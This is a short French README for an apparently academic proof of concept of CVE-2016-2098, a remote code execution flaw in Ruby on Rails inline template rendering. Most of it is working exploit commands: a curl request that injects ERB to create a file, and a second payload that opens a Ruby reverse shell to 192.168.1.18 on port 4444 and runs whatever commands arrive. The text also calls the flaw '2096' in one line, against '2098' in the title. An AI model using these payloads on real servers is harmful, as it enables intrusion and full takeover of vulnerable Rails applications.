
Preuve de concept CVE-2016-2098
Projet universitaire créé par @alejandro-marting où nous pouvons vérifier la vulnérabilité 2096
Utilisation :
Tout d'abord, nous devons exécuter le serveur rails avec la commande suivante :
$ rvmsudo rails server -b 0.0.0.0 -p 80
Maintenant, nous pouvons provoquer l'exécution de code à distance avec la commande suivante :
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(Un fichier 'rooted' devrait être généré)
Si vous souhaitez essayer un reverse shell avec une injection de code Ruby, vous pouvez exécuter la commande suivante :
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
Si vous avez des questions, contactez-moi s'il vous plaît !